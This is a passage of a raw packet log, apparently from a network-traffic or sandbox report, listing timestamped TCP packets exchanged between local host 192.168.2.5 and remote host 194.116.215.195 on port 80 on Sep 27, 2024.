                                                                          Sep 27, 2024 04:21:07.249274969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249285936 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249295950 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249316931 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249320030 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249340057 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249355078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249378920 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249392033 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249403954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249413013 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249433994 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249433994 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249454021 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249475956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249488115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249517918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249531984 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249608040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249619961 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249630928 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249640942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249650002 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249655008 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249661922 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249670029 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249680996 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249692917 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249694109 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249705076 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249739885 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249771118 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249783993 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249794960 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249805927 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249815941 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249816895 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249828100 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249844074 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249874115 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249908924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249921083 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249932051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249954939 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249973059 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249977112 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249988079 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249999046 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250010967 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250021935 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250021935 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250047922 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250082016 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250103951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250144958 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250209093 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250221968 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250232935 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250243902 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250255108 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250255108 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250267982 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250274897 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250281096 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250296116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250307083 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250324011 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250350952 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250497103 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250509024 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250519991 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250530958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250543118 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250544071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250557899 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250564098 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250596046 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250610113 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250629902 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250642061 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250652075 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250663042 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250674009 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250678062 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250682116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250698090 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250729084 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250905037 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250916958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250927925 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250940084 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250951052 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250950098 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250962973 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250974894 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.250976086 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.250984907 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251003981 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251008034 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.251017094 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251024961 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.251029968 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251044035 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251054049 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.251085997 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.251133919 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251146078 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251157999 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251169920 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.251183033 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.251213074 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.293071985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293087959 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293107033 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293118954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293129921 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293140888 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293145895 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.293152094 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293164015 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.293207884 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.293229103 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.338781118 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338804007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338816881 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338828087 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338840961 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338855982 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.338891029 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.338920116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338932991 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338943958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338957071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338968039 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.338969946 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.338995934 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339003086 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339030027 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339046001 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339065075 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339075089 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339078903 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339107037 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339118958 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339148045 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339159012 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339170933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339199066 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339199066 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339216948 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339221001 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339234114 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339246035 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339260101 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339272022 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339282990 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339293003 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339294910 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339320898 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339323997 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339330912 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339337111 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339360952 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339374065 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339433908 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339446068 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339456081 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339478016 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339483023 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339493990 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339495897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339521885 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339546919 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339556932 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339569092 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339581013 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339598894 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339622021 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339622021 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339657068 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339669943 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339679956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339690924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339701891 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339705944 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339713097 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339720964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339730978 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339731932 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339756966 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339776039 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339788914 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339808941 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339821100 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339843988 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339870930 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339895964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339907885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339917898 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.339931011 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339945078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339963913 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.339999914 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340010881 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340022087 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340033054 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340037107 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340049028 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340049982 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340061903 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340064049 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340074062 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340085983 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340095997 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340122938 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340214968 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340230942 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340243101 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340253115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340260983 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340265989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340270996 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340279102 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340290070 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340311050 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340372086 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340383053 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340395927 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340406895 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340420008 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340421915 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340431929 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340437889 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340445042 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340457916 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340459108 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340482950 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340507984 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340569019 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340579987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340590954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340620041 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340631008 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340637922 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340650082 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340662956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340678930 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340704918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340790987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340801954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340812922 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340825081 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340836048 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340837002 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340847969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340859890 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340868950 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340902090 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.340939999 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340953112 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.340981007 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341007948 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341036081 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341048956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341058969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341070890 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341079950 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341084957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341097116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341100931 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341126919 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341142893 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341176987 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341187000 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341197968 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341208935 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341216087 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341221094 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341233969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341242075 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341262102 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341317892 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341329098 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341363907 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341393948 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341495991 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341509104 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341519117 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341530085 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341542006 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341542959 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341555119 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341562986 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341567993 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341579914 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341590881 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341592073 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341605902 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341609955 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341619015 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341628075 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341630936 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341636896 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341643095 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341655970 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.341677904 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.341701984 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.389645100 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389661074 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389672995 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389708996 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389720917 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389730930 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.389731884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389745951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.389761925 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.389785051 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429471970 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429488897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429501057 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429512024 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429531097 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429553032 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429555893 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.429574966 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.429586887 CEST8049713194.116.215.195192.168.2.5
